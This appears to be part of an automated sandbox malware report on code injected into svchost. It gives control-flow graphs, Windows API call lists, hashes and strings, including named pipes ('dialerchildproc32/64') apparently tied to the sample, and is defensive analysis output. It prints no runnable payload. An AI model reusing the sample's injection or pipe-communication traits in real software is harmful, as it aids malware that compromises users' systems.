                                                                      control_flow_graph 201 14e255d6910-14e255d6916 202 14e255d6918-14e255d691b 201->202 203 14e255d6951-14e255d695b 201->203 205 14e255d691d-14e255d6920 202->205 206 14e255d6945-14e255d6984 call 14e255d6fc0 202->206 204 14e255d6a78-14e255d6a8d 203->204 210 14e255d6a9c-14e255d6ab6 call 14e255d6e54 204->210 211 14e255d6a8f 204->211 208 14e255d6938 __scrt_dllmain_crt_thread_attach 205->208 209 14e255d6922-14e255d6925 205->209 223 14e255d698a-14e255d699f call 14e255d6e54 206->223 224 14e255d6a52 206->224 212 14e255d693d-14e255d6944 208->212 214 14e255d6927-14e255d6930 209->214 215 14e255d6931-14e255d6936 call 14e255d6f04 209->215 221 14e255d6ab8-14e255d6aed call 14e255d6f7c call 14e255d6e1c call 14e255d7318 call 14e255d7130 call 14e255d7154 call 14e255d6fac 210->221 222 14e255d6aef-14e255d6b20 call 14e255d7190 210->222 216 14e255d6a91-14e255d6a9b 211->216 215->212 221->216 233 14e255d6b22-14e255d6b28 222->233 234 14e255d6b31-14e255d6b37 222->234 236 14e255d6a6a-14e255d6a77 call 14e255d7190 223->236 237 14e255d69a5-14e255d69b6 call 14e255d6ec4 223->237 227 14e255d6a54-14e255d6a69 224->227 233->234 238 14e255d6b2a-14e255d6b2c 233->238 239 14e255d6b39-14e255d6b43 234->239 240 14e255d6b7e-14e255d6b94 call 14e255d268c 234->240 236->204 254 14e255d6a07-14e255d6a11 call 14e255d7130 237->254 255 14e255d69b8-14e255d69dc call 14e255d72dc call 14e255d6e0c call 14e255d6e38 call 14e255dac0c 237->255 244 14e255d6c1f-14e255d6c2c 238->244 245 14e255d6b45-14e255d6b4d 239->245 246 14e255d6b4f-14e255d6b5d call 14e255e5780 239->246 262 14e255d6bcc-14e255d6bce 240->262 263 14e255d6b96-14e255d6b98 240->263 251 14e255d6b63-14e255d6b78 call 14e255d6910 245->251 246->251 266 14e255d6c15-14e255d6c1d 246->266 251->240 251->266 254->224 276 14e255d6a13-14e255d6a1f call 14e255d7180 254->276 255->254 304 14e255d69de-14e255d69e5 __scrt_dllmain_after_initialize_c 255->304 264 14e255d6bd5-14e255d6bea call 14e255d6910 262->264 265 14e255d6bd0-14e255d6bd3 262->265 263->262 271 14e255d6b9a-14e255d6bbc call 14e255d268c call 14e255d6a78 263->271 264->266 285 14e255d6bec-14e255d6bf6 264->285 265->264 265->266 266->244 271->262 297 14e255d6bbe-14e255d6bc6 call 14e255e5780 271->297 293 14e255d6a45-14e255d6a50 276->293 294 14e255d6a21-14e255d6a2b call 14e255d7098 276->294 290 14e255d6bf8-14e255d6bff 285->290 291 14e255d6c01-14e255d6c11 call 14e255e5780 285->291 290->266 291->266 293->227 294->293 303 14e255d6a2d-14e255d6a3b 294->303 297->262 303->293 304->254 305 14e255d69e7-14e255d6a04 call 14e255dabc8 304->305 305->254
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 2332f7615c00a9b45a6cd8c5de408ca84be1c3b81a06dd6493736303431c435b
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 9681D333E8264386FA509B659E41BD963DDFB87780F6880159A4B877B6DBFCC8478700
                                                                      Function 0000014E25EDCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 308 14e25edce28-14e25edce4a GetLastError 309 14e25edce4c-14e25edce57 FlsGetValue 308->309 310 14e25edce69-14e25edce74 FlsSetValue 308->310 311 14e25edce59-14e25edce61 309->311 312 14e25edce63 309->312 313 14e25edce7b-14e25edce80 310->313 314 14e25edce76-14e25edce79 310->314 315 14e25edced5-14e25edcee0 SetLastError 311->315 312->310 316 14e25edce85 call 14e25edd6cc 313->316 314->315 317 14e25edcee2-14e25edcef4 315->317 318 14e25edcef5-14e25edcf0b call 14e25edc748 315->318 319 14e25edce8a-14e25edce96 316->319 332 14e25edcf0d-14e25edcf18 FlsGetValue 318->332 333 14e25edcf28-14e25edcf33 FlsSetValue 318->333 321 14e25edcea8-14e25edceb2 FlsSetValue 319->321 322 14e25edce98-14e25edce9f FlsSetValue 319->322 325 14e25edcec6-14e25edced0 call 14e25edcb94 call 14e25edd744 321->325 326 14e25edceb4-14e25edcec4 FlsSetValue 321->326 324 14e25edcea1-14e25edcea6 call 14e25edd744 322->324 324->314 325->315 326->324 334 14e25edcf1a-14e25edcf1e 332->334 335 14e25edcf22 332->335 337 14e25edcf98-14e25edcf9f call 14e25edc748 333->337 338 14e25edcf35-14e25edcf3a 333->338 334->337 339 14e25edcf20 334->339 335->333 340 14e25edcf3f call 14e25edd6cc 338->340 342 14e25edcf8f-14e25edcf97 339->342 343 14e25edcf44-14e25edcf50 340->343 345 14e25edcf62-14e25edcf6c FlsSetValue 343->345 346 14e25edcf52-14e25edcf59 FlsSetValue 343->346 347 14e25edcf6e-14e25edcf7e FlsSetValue 345->347 348 14e25edcf80-14e25edcf88 call 14e25edcb94 345->348 349 14e25edcf5b-14e25edcf60 call 14e25edd744 346->349 347->349 348->342 354 14e25edcf8a call 14e25edd744 348->354 349->337 354->342
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 0000014E25EDCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEBC
                                                                      • SetLastError.KERNEL32 ref: 0000014E25EDCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,0000014E25EDECCC,?,?,?,?,0000014E25EDBF9F,?,?,?,?,?,0000014E25ED7AB0), ref: 0000014E25EDCF2C
                                                                        • Part of subcall function 0000014E25EDD6CC: HeapAlloc.KERNEL32 ref: 0000014E25EDD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF54
                                                                        • Part of subcall function 0000014E25EDD744: HeapFree.KERNEL32 ref: 0000014E25EDD75A
                                                                        • Part of subcall function 0000014E25EDD744: GetLastError.KERNEL32 ref: 0000014E25EDD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 0e38215d1457e59afe65eb01ec79511c82aee5c2ce1e14f3d06b2e4fe1cd1a9d
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 69416F7025324485FAE9A7359F51BF962CEBB877F0F142B24A83B466F6DEE984014341
                                                                      Function 0000014E25ED2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: f3f1b66307ed9429f7177bedba5dbcb25a8199bf3a3daf748d0c8febe8376095
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 5321307262475082EB50CB25FA4479963E8F7897A4F500215DA5A02BB9CFBCC549CB00
                                                                      Function 0000014E255D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 453 14e255d9944-14e255d99ac call 14e255da814 456 14e255d9e13-14e255d9e1b call 14e255dbb48 453->456 457 14e255d99b2-14e255d99b5 453->457 457->456 459 14e255d99bb-14e255d99c1 457->459 460 14e255d99c7-14e255d99cb 459->460 461 14e255d9a90-14e255d9aa2 459->461 460->461 465 14e255d99d1-14e255d99dc 460->465 463 14e255d9aa8-14e255d9aac 461->463 464 14e255d9d63-14e255d9d67 461->464 463->464 466 14e255d9ab2-14e255d9abd 463->466 468 14e255d9d69-14e255d9d70 464->468 469 14e255d9da0-14e255d9daa call 14e255d8a34 464->469 465->461 467 14e255d99e2-14e255d99e7 465->467 466->464 470 14e255d9ac3-14e255d9aca 466->470 467->461 471 14e255d99ed-14e255d99f7 call 14e255d8a34 467->471 468->456 472 14e255d9d76-14e255d9d9b call 14e255d9e1c 468->472 469->456 482 14e255d9dac-14e255d9dcb call 14e255d6d40 469->482 474 14e255d9c94-14e255d9ca0 470->474 475 14e255d9ad0-14e255d9b07 call 14e255d8e10 470->475 471->482 486 14e255d99fd-14e255d9a28 call 14e255d8a34 * 2 call 14e255d9124 471->486 472->469 474->469 479 14e255d9ca6-14e255d9caa 474->479 475->474 490 14e255d9b0d-14e255d9b15 475->490 483 14e255d9cba-14e255d9cc2 479->483 484 14e255d9cac-14e255d9cb8 call 14e255d90e4 479->484 483->469 489 14e255d9cc8-14e255d9cd5 call 14e255d8cb4 483->489 484->483 497 14e255d9cdb-14e255d9ce3 484->497 521 14e255d9a2a-14e255d9a2e 486->521 522 14e255d9a48-14e255d9a52 call 14e255d8a34 486->522 489->469 489->497 495 14e255d9b19-14e255d9b4b 490->495 499 14e255d9c87-14e255d9c8e 495->499 500 14e255d9b51-14e255d9b5c 495->500 502 14e255d9df6-14e255d9e12 call 14e255d8a34 * 2 call 14e255dbaa8 497->502 503 14e255d9ce9-14e255d9ced 497->503 499->474 499->495 500->499 504 14e255d9b62-14e255d9b7b 500->504 502->456 506 14e255d9cef-14e255d9cfe call 14e255d90e4 503->506 507 14e255d9d00 503->507 508 14e255d9c74-14e255d9c79 504->508 509 14e255d9b81-14e255d9bc6 call 14e255d90f8 * 2 504->509 517 14e255d9d03-14e255d9d0d call 14e255da8ac 506->517 507->517 513 14e255d9c84 508->513 537 14e255d9bc8-14e255d9bee call 14e255d90f8 call 14e255da038 509->537 538 14e255d9c04-14e255d9c0a 509->538 513->499 517->469 529 14e255d9d13-14e255d9d61 call 14e255d8d44 call 14e255d8f50 517->529 521->522 528 14e255d9a30-14e255d9a3b 521->528 522->461 536 14e255d9a54-14e255d9a74 call 14e255d8a34 * 2 call 14e255da8ac 522->536 528->522 533 14e255d9a3d-14e255d9a42 528->533 529->469 533->456 533->522 559 14e255d9a8b 536->559 560 14e255d9a76-14e255d9a80 call 14e255da99c 536->560 553 14e255d9c15-14e255d9c72 call 14e255d9870 537->553 554 14e255d9bf0-14e255d9c02 537->554 542 14e255d9c7b 538->542 543 14e255d9c0c-14e255d9c10 538->543 547 14e255d9c80 542->547 543->509 547->513 553->547 554->537 554->538 559->461 563 14e255d9a86-14e255d9def call 14e255d86ac call 14e255da3f4 call 14e255d88a0 560->563 564 14e255d9df0-14e255d9df5 call 14e255dbaa8 560->564 563->564 564->502
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: b2a34a7c217fcdebc7505ea3e7ea67a3eaa2ec335367fa87b754eea6f7af43be
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: CDE1E573A46B4286EB60DF65DA80BDD77F8F756B98F000115EE4A57BA9CB78C091C700
                                                                      Function 0000014E25EDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 574 14e25eda544-14e25eda5ac call 14e25edb414 577 14e25edaa13-14e25edaa1b call 14e25edc748 574->577 578 14e25eda5b2-14e25eda5b5 574->578 578->577 579 14e25eda5bb-14e25eda5c1 578->579 581 14e25eda5c7-14e25eda5cb 579->581 582 14e25eda690-14e25eda6a2 579->582 581->582 586 14e25eda5d1-14e25eda5dc 581->586 584 14e25eda6a8-14e25eda6ac 582->584 585 14e25eda963-14e25eda967 582->585 584->585 587 14e25eda6b2-14e25eda6bd 584->587 589 14e25eda969-14e25eda970 585->589 590 14e25eda9a0-14e25eda9aa call 14e25ed9634 585->590 586->582 588 14e25eda5e2-14e25eda5e7 586->588 587->585 591 14e25eda6c3-14e25eda6ca 587->591 588->582 592 14e25eda5ed-14e25eda5f7 call 14e25ed9634 588->592 589->577 593 14e25eda976-14e25eda99b call 14e25edaa1c 589->593 590->577 600 14e25eda9ac-14e25eda9cb call 14e25ed7940 590->600 595 14e25eda894-14e25eda8a0 591->595 596 14e25eda6d0-14e25eda707 call 14e25ed9a10 591->596 592->600 608 14e25eda5fd-14e25eda628 call 14e25ed9634 * 2 call 14e25ed9d24 592->608 593->590 595->590 601 14e25eda8a6-14e25eda8aa 595->601 596->595 612 14e25eda70d-14e25eda715 596->612 605 14e25eda8ba-14e25eda8c2 601->605 606 14e25eda8ac-14e25eda8b8 call 14e25ed9ce4 601->606 605->590 611 14e25eda8c8-14e25eda8d5 call 14e25ed98b4 605->611 606->605 618 14e25eda8db-14e25eda8e3 606->618 640 14e25eda62a-14e25eda62e 608->640 641 14e25eda648-14e25eda652 call 14e25ed9634 608->641 611->590 611->618 616 14e25eda719-14e25eda74b 612->616 620 14e25eda887-14e25eda88e 616->620 621 14e25eda751-14e25eda75c 616->621 623 14e25eda9f6-14e25edaa12 call 14e25ed9634 * 2 call 14e25edc6a8 618->623 624 14e25eda8e9-14e25eda8ed 618->624 620->595 620->616 621->620 625 14e25eda762-14e25eda77b 621->625 623->577 627 14e25eda8ef-14e25eda8fe call 14e25ed9ce4 624->627 628 14e25eda900 624->628 629 14e25eda874-14e25eda879 625->629 630 14e25eda781-14e25eda7c6 call 14e25ed9cf8 * 2 625->630 633 14e25eda903-14e25eda90d call 14e25edb4ac 627->633 628->633 635 14e25eda884 629->635 655 14e25eda7c8-14e25eda7ee call 14e25ed9cf8 call 14e25edac38 630->655 656 14e25eda804-14e25eda80a 630->656 633->590 653 14e25eda913-14e25eda961 call 14e25ed9944 call 14e25ed9b50 633->653 635->620 640->641 647 14e25eda630-14e25eda63b 640->647 641->582 659 14e25eda654-14e25eda674 call 14e25ed9634 * 2 call 14e25edb4ac 641->659 647->641 652 14e25eda63d-14e25eda642 647->652 652->577 652->641 653->590 674 14e25eda815-14e25eda872 call 14e25eda470 655->674 675 14e25eda7f0-14e25eda802 655->675 663 14e25eda87b 656->663 664 14e25eda80c-14e25eda810 656->664 680 14e25eda68b 659->680 681 14e25eda676-14e25eda680 call 14e25edb59c 659->681 668 14e25eda880 663->668 664->630 668->635 674->668 675->655 675->656 680->582 684 14e25eda686-14e25eda9ef call 14e25ed92ac call 14e25edaff4 call 14e25ed94a0 681->684 685 14e25eda9f0-14e25eda9f5 call 14e25edc6a8 681->685 684->685 685->623
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: dc5baa9e4900bccee7b18694ed6ad8fc180f2675819547d15587c8c5e04f39b1
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 7FE1D472606B408AEBA0DF65DE40BDD77ECF756B98F102115EE8A57BA9CB78C181C700
                                                                      Function 0000014E25EDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 695 14e25edf394-14e25edf3e6 696 14e25edf3ec-14e25edf3ef 695->696 697 14e25edf4d7 695->697 698 14e25edf3f9-14e25edf3fc 696->698 699 14e25edf3f1-14e25edf3f4 696->699 700 14e25edf4d9-14e25edf4f5 697->700 701 14e25edf4bc-14e25edf4cf 698->701 702 14e25edf402-14e25edf411 698->702 699->700 701->697 703 14e25edf413-14e25edf416 702->703 704 14e25edf421-14e25edf440 LoadLibraryExW 702->704 705 14e25edf41c 703->705 706 14e25edf516-14e25edf525 GetProcAddress 703->706 707 14e25edf4f6-14e25edf50b 704->707 708 14e25edf446-14e25edf44f GetLastError 704->708 709 14e25edf4a8-14e25edf4af 705->709 711 14e25edf527-14e25edf54e 706->711 712 14e25edf4b5 706->712 707->706 710 14e25edf50d-14e25edf510 FreeLibrary 707->710 713 14e25edf496-14e25edf4a0 708->713 714 14e25edf451-14e25edf468 call 14e25edc928 708->714 709->702 709->712 710->706 711->700 712->701 713->709 714->713 717 14e25edf46a-14e25edf47e call 14e25edc928 714->717 717->713 720 14e25edf480-14e25edf494 LoadLibraryExW 717->720 720->707 720->713
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 22fee92a7b634e20b8207f9d96fbe19373ab9512f5f1e434ffbaebbadbf46c39
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: BA41C432322A1051EA96CF16AE00FE923DDBB46BE0F196129DD1F877A5EEB8C4458301
                                                                      Function 0000014E25ED104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 721 14e25ed104c-14e25ed10b9 RegQueryInfoKeyW 722 14e25ed11b5-14e25ed11d0 721->722 723 14e25ed10bf-14e25ed10c9 721->723 723->722 724 14e25ed10cf-14e25ed111f RegEnumValueW 723->724 725 14e25ed11a5-14e25ed11af 724->725 726 14e25ed1125-14e25ed112a 724->726 725->722 725->724 726->725 727 14e25ed112c-14e25ed1135 726->727 728 14e25ed1147-14e25ed114c 727->728 729 14e25ed1137 727->729 731 14e25ed1199-14e25ed11a3 728->731 732 14e25ed114e-14e25ed1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->732 730 14e25ed113b-14e25ed113f 729->730 730->725 733 14e25ed1141-14e25ed1145 730->733 731->725 732->731 733->728 733->730
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: d53801182b1a1fddabf9b2cb97fa914ecb6b5c17acb5066caa3a10faa4a8568e
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: DE418073214B84C6E7A4CF21E94479E77E9F389B98F148129DB8A07B68DF78C549CB00
                                                                      Function 0000014E25EDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 67d499ed1cae324e52016772c9b3e2eb920b02c753671c71406fddec84103b65
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 0511633070664441FAE89B359F51BED62CEBB877F0F546324983B066FADEE9C8028301
                                                                      Function 0000014E25ED7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: eec92c873ab8a8532cd6d95de1f2b50f3b3f0ee532591f7514190b140d4d18b8
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 20811E71A1224186FBD0AB25AE43FD922DDBB87780F146425AA4B437F7EBF9C841C700
                                                                      Function 0000014E25ED9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 4b673a47d5b222b7fe4c6400c13b60ea41fad0e13ee299185a4e4a279635b7ed
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 4731C731313640E1EEA2DB42AE00FE962DCB759BB0F5916259D1F8B3B5EFB9C5458300
                                                                      Function 0000014E25EE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: dac870ae50dc774142f57e224bcde91fef96868b3a026d0ca4bce480cb7abb85
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: D6115E31220B4086E7A18B52F944B5976E8F788FF4F144214EA5F877B5DFB8C5148740
                                                                      Function 0000014E25ED3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
